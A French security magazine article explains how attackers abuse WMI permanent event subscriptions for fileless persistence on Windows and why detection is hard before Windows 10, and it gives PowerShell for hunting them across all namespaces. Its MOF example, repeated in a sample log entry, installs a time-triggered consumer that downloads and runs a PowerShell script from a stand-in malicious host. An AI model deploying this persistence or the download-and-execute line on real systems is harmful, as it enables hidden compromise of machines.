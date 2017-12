Les mécanismes de démarrage automatique de programme disponibles sous Windows sont nombreux. Le nombre d’onglets de l’outil Microsoft « Autoruns » suffit pour s’en convaincre. Parmi ceux-ci, l’utilisation de la technologie WMI (Windows Management Instrumentation) à des fins de persistance malveillante semble prendre de l’importance depuis quelques années. Rappelons qu’un tel mécanisme implique un contexte post-compromission (avec privilèges administrateur dans le cas présent). La persistance WMI a été abordée dans un précédent article de MISC n°80 (« WMI : la menace silencieuse ») qui permet de prendre la mesure des limites de la journalisation standard à des fins de détection. En effet, le challenge n’est pas tant de détecter cette persistance lors d’une analyse sur incident : des méthodes et outils existent pour l’identifier (si elle est toujours active). La véritable difficulté est de pouvoir alimenter facilement un SIEM afin de la détecter lors de son installation et permettre une réaction avant que la bombe logique n’explose. Seul Windows 10 marque une avancée dans ce domaine et en permet une détection native. L’article présente un axe d’amélioration possible pour les versions antérieures de Windows, permettant d’être plus réactif vis-à-vis de cette menace.

1. WMI en bref

En tant que technologie d’instrumentation, WMI permet de superviser et modifier l’état de nombreuses ressources gérées par le système d’exploitation Windows (de la couche matérielle à la couche application) et ce, localement ou à distance (via DCOM ou WinRM). Elle permet donc naturellement de réaliser des inventaires (les inventaires SCCM utilisent WMI par exemple) et la modification des objets permet une administration locale ou distante des postes et serveurs Windows. Installée en standard sur toutes les versions de Windows depuis Windows 2000, on comprend l’intérêt que WMI représente pour un attaquant.

Une ressource est décrite sous forme de classe (attributs/méthodes) et pour manipuler cette ressource (obtenir des informations ou modifier son état), on instancie la classe associée.

Les classes sont fournies soit par des « providers » (composant COM), soit directement par WMI (classes internes dites « systèmes » nécessaires au fonctionnement de WMI) et sont organisées dans une arborescence hiérarchique de namespaces au sein du repository WMI.

Les applications « clientes » souhaitant gérer les ressources à travers WMI peuvent être développées sous divers langages de programmation (VBScript, PowerShell, C++,…) disposant d’une API pour WMI.

Pour mieux appréhender ces concepts théoriques, l’utilisation de wbemtest.exe (installé en standard sous Windows) ou d’autres outils comme WMI Explorer [1] est conseillée.

2. Persistance WMI

WMI gère également des événements (sous forme d’instances de classes d’événements) qui représentent des changements d’états des ressources du système d’exploitation ou du repository WMI lui-même. Il est possible de s’abonner de manière permanente (qui persiste au reboot) à des événements et déclencher une réaction automatique préalablement configurée. Ce mécanisme d’abonnement permanent, détourné par la malveillance informatique est connu sous le nom de persistance WMI. WMI permet en effet de réaliser de véritables bombes logiques (codes malveillants qui se déclencheront sur un événement particulier). Une particularité du mécanisme réside dans le fait que la charge peut être enregistrée directement dans le repository WMI, ce qui permet de réaliser une attaque dite « fileless », car aucun nouveau fichier n’est créé sur le système de fichiers infecté.

Techniquement, mettre en œuvre un abonnement permanent consiste au sein d’un namespace à instancier :

la classe système __EventFilter : une requête WQL (SQL for WMI) sur le ou les événements à surveiller est configurée dans cette instance (« trigger ») ;

une classe dérivée de la classe système __EventConsumer : l’action à réaliser (exécution de script/binaire, journalisation…) est configurée dans cette instance (« charge ») ;

la classe système __FilterToConsumerBinding : la mise en relation du « trigger » et de la « charge » est configurée dans cette instance.

Pour illustrer le mécanisme, le fichier suivant écrit en langage MOF [2] présente un exemple de persistance (un script PowerShell ou VBScript aurait pu aussi être utilisé).

#pragma namespace ("\\\\.\\Root\\subscription") instance of __EventFilter as $filter { EventNamespace = "Root\\Cimv2"; Name = "MyFilter"; Query="SELECT * FROM __InstanceModificationEvent WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Year = 2017 AND TargetInstance.Month=6 AND TargetInstance.Day=1 TargetInstance.Hour=8 AND TargetInstance.Minute=0 AND TargetInstance.Second=0 "; QueryLanguage = "WQL"; }; instance of CommandLineEventConsumer as $consumer { Name = "MyConsumer"; CommandLineTemplate = "powershell.exe -exec bypass -Command \"IEX ((New-Object Net.WebClient).DownloadString('https://malwaresite/ex.ps1'))\" "; RunInteractively = False; }; instance of __FiltertoConsumerBinding { Consumer = $consumer; Filter = $filter; }; 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 #pragma namespace ("\\\\.\\Root\\subscription") instance of __EventFilter as $ filter { EventNamespace = "Root\\Cimv2" ; Name = "MyFilter" ; Query = "SELECT * FROM __InstanceModificationEvent WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Year = 2017 AND TargetInstance.Month=6 AND TargetInstance.Day=1 TargetInstance.Hour=8 AND TargetInstance.Minute=0 AND TargetInstance.Second=0 " ; QueryLanguage = "WQL" ; } ; instance of CommandLineEventConsumer as $ consumer { Name = "MyConsumer" ; CommandLineTemplate = "powershell.exe -exec bypass -Command \"IEX ((New-Object Net.WebClient).DownloadString('https://malwaresite/ex.ps1'))\" " ; RunInteractively = False ; } ; instance of __FiltertoConsumerBinding { Consumer = $ consumer ; Filter = $ filter ; } ;

Une fois compilé par le binaire mofcomp.exe, un tel script configure une demande d’exécution d’un script PowerShell téléchargé depuis un site web pour le 01/06/2017 à 08:00:00.

3. Comprendre l’attaque

Il est important de rappeler quelques points essentiels pour bien cerner l’attaque de persistance WMI.

La mise en œuvre d’un mécanisme d’abonnement permanent nécessite par défaut les droits administrateurs sur le poste.

Les trois objets instanciés doivent être enregistrés au sein du même namespace (dans l’exemple, root\subscription). Le support « cross-namespace » par la classe __FilterToConsumerBinding n’est possible que si l’association concerne deux objets statiques. Or la classe CommandLineEventConsumer (comme toutes les autres classes d’eventconsumer) est une classe dynamique, fournie par le provider du même nom qui est défini dans le fichier wbemscons.mof et implémenté par la dll wbemcons.dll (cf. [3]).

La requête WQL associée à l’instance de la classe __EventFilter supporte le « cross-namespace » (via l’attribut EventNamespace) : on peut s’abonner à un événement concernant un objet situé dans un autre namespace. Dans l’exemple, le filtre est instancié dans le namespace root\subscription, mais s’abonne à un événement de modification (__InstanceModificationEvent) du « temps » représenté par la classe Win32_LocalTime présente dans le namespace root\cimv2.

Les classes systèmes (reconnaissables au préfixe «__») liées à la gestion des événements sont présentes dans tous les namespaces (et tout nouveau namespace).

Windows fournit en standard des classes dérivant la classe __EventConsumer que l’on peut instancier pour réaliser une action automatique sur réception d’événements (cf. [4]). On peut citer, en exemple :

ActiveScriptEventConsumer : permet d’exécuter un script VBScript ou JScript qui peut être embarqué directement dans le repository WMI (voir l’exemple [5] ) ;

CommandLineEventConsumer : permet de lancer un exécutable présent sur le disque, utilisé dans notre exemple ;

NTEventLogEventConsumer : permet de journaliser une information dans le journal « Application ».

Ces classes sont compilées par défaut dans différents namespaces (dépendant de la version du système), mais a minima dans root\subscription.

Sous Windows 7 par exemple, on les retrouve également dans le namespace root\default. La commande suivante permet de vérifier les namespaces où la classe CommandLineEventconsumer est disponible :

Get-WMIObject -Namespace root -Class CommandLineEventConsumer -List –Recurse | Select __NAMESPACE __NAMESPACE ----------- ROOT\subscription ROOT\DEFAULT 1 2 3 4 5 Get - WMIObject - Namespace root - Class CommandLineEventConsumer - List – Recurse | Select __NAMESPACE __NAMESPACE -- -- -- -- -- - ROOT \ subscription ROOT \ DEFAULT

L’exemple donné au paragraphe 2 aurait donc pu utiliser également le namespace root\default pour réaliser la persistance.

L’attaque n’est cependant pas limitée à l’utilisation de l’un de ces deux namespaces. Dixit la documentation de Microsoft ([6]): « It is recommended that all permanent subscriptions be compiled into the \root\subscription namespace. This prevents the need to compile the permanent consumer into each namespace being used, which means that there is only one namespace to look for permanent subscriptions ».

C’est donc une bonne pratique de travailler dans root\subscription, mais rien n’empêche d’enregistrer dans n’importe quel namespace le provider de l’eventconsumer désiré. Il suffit de regarder le fichier %windir%\system32\wbem\wbemscons.mof pour lire les instanciations nécessaires à ce type d’enregistrement. Il est également possible pour un attaquant de créer son propre namespace avant d’y enregistrer le provider dont il a besoin pour persister.

Détecter efficacement cette persistance revient donc à devoir surveiller tous les namespaces existants (et à minima surveiller la création de nouveaux namespaces).

4. Limites de la détection actuelle

Deux outils sont parfois cités pour détecter le mécanisme de persistance WMI en traitement d’incidents. Le célèbre « Autoruns » de Microsoft et le framework PowerShell de réponse à incidents « Kansa » ([7] [8]).

À l’heure de rédaction de l’article, « Autoruns » ne remonte que les persistances instanciées dans le namespace root\subscription. « Kansa » quant à lui se contentait de la même chose avant une mise à jour en décembre 2016 permettant de remonter les persistances instanciées dans root\default également. Aucun de ces deux outils ne détecte(ait?) donc correctement la menace.

Il reste heureusement très simple d’y remédier, en complétant l’analyse par une recherche exhaustive dans l’ensemble des namespaces, par exemple avec la fonction PowerShell suivante :

Function Get-WmiInstance($Namespace, $Class) { Get-WMIObject -Namespace $Namespace -Class $Class Get-WMIObject -Namespace $Namespace -Class __Namespace | % { Get-WmiInstance -Namespace "$Namespace\$($_.Name)" -Class $Class } } 1 2 3 4 5 6 Function Get - WmiInstance ( $ Namespace , $ Class ) { Get - WMIObject - Namespace $ Namespace - Class $ Class Get - WMIObject - Namespace $ Namespace - Class __Namespace | % { Get - WmiInstance - Namespace "$Namespace\$($_.Name)" - Class $ Class } }

Get-WmiInstance -Namespace root -Class___FilterToConsumerBinding | Select __NAMESPACE,Filter,Consumer __NAMESPACE Filter Consumer ----------- ------ -------- ROOT\subscription EventFilter.Name="SCM [...]" NTEventLogEventConsumer.Name="SCM [...]" ROOT\DEFAULT EventFilter.Name="MyFilter" CommandLineEventConsumer.Name="MyConsumer" 1 2 3 4 5 Get - WmiInstance - Namespace root - Class___FilterToConsumerBinding | Select __NAMESPACE , Filter , Consumer __NAMESPACE & nbsp ; & nbsp ; & nbsp ; Filter & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; Consumer -- -- -- -- -- - & nbsp ; & nbsp ; & nbsp ; -- -- -- & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; & nbsp ; -- -- -- -- ROOT \ subscription EventFilter . Name = "SCM [...]" & nbsp ; & nbsp ; & nbsp ; NTEventLogEventConsumer . Name = "SCM [...]" ROOT \ DEFAULT & nbsp ; EventFilter . Name = "MyFilter" & nbsp ; & nbsp ; & nbsp ; & nbsp ; CommandLineEventConsumer . Name = "MyConsumer"

En ce qui concerne la détection basée sur une analyse des journaux Windows collectés dans un SIEM par exemple, la difficulté principale provient du fait qu’avant Windows 10, seuls des journaux de trace/debug sont capables de détecter le mécanisme. Or ces journaux ne sont ni activés par défaut, ni collectables directement par exemple par le service standard de collecte des logs Windows : ce sont des fichiers textes dédiés (XP) ou depuis Windows Vista, des fichiers de traces ETW (format binaire du journal « Applications et services » Microsoft-Windows-WMI-Activity/Trace). De plus, les événements remontés dans ce journal de trace ne permettent pas d’avoir les informations détaillées sur la « charge » et le « trigger ».

Seul Windows 10 journalise toutes les informations utiles dans l’événement d’eventid 4861 du journal « Applications et services » Microsoft-Windows-WMI-Activity/Operationnal :

Namespace = //./root/subscription; Eventfilter = "MyFilter" (refer to its activate eventid:5859); Consumer = CommandLineEventConsumer="MyConsumer"; PossibleCause = Binding EventFilter: instance of __EventFilter { CreatorSID = {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}; EventNamespace = "root\\cimv2"; Name = "MyFilter"; Query="SELECT * FROM __InstanceModificationEvent WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Year = 2017 AND TargetInstance.Month=6 AND TargetInstance.Day=1 TargetInstance.Hour=8 AND TargetInstance.Minute=0 AND TargetInstance.Second=0 "; QueryLanguage = "WQL"; }; Perm. Consumer: instance of CommandLineEventConsumer { CommandLineTemplate = "powershell.exe -exec bypass -Command \"IEX ((New-Object Net.WebClient).DownloadString('https://malwaresite/ex.ps1'))\""; CreatorSID = {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}; Name = "MyConsumer"; }; 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 Namespace = //./root/subscription; Eventfilter = "MyFilter" (refer to its activate eventid:5859); Consumer = CommandLineEventConsumer="MyConsumer"; PossibleCause = Binding EventFilter: instance of __EventFilter { CreatorSID = { 1 , 2 , 0 , 0 , 0 , 0 , 0 , 5 , 32 , 0 , 0 , 0 , 32 , 2 , 0 , 0 } ; EventNamespace = "root\\cimv2" ; Name = "MyFilter" ; Query = "SELECT * FROM __InstanceModificationEvent WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Year = 2017 AND TargetInstance.Month=6 AND TargetInstance.Day=1 TargetInstance.Hour=8 AND TargetInstance.Minute=0 AND TargetInstance.Second=0 " ; QueryLanguage = "WQL" ; } ; Perm . Consumer : instance of CommandLineEventConsumer { CommandLineTemplate = "powershell.exe -exec bypass -Command \"IEX ((New-Object Net.WebClient).DownloadString('https://malwaresite/ex.ps1'))\"" ; CreatorSID = { 1 , 2 , 0 , 0 , 0 , 0 , 0 , 5 , 32 , 0 , 0 , 0 , 32 , 2 , 0 , 0 } ; Name = "MyConsumer" ; } ;

Jean-Philip GUICHARD

jean-philip.guichard@cea.fr

Bruno WYTTENBACH

bruno.wyttenbach@cea.fr

Service des Technologies de l’Information et Communication, Direction Énergie Nucléaire, CEA

La seconde partie de cet article sera publiée prochainement sur le blog, restez connectés 😉

Retrouvez cet article (et bien d’autres) dans MISC n°91, disponible sur la boutique et sur la plateforme de lecture en ligne Connect !

Partager : sur Twitter sur Facebook sur Google+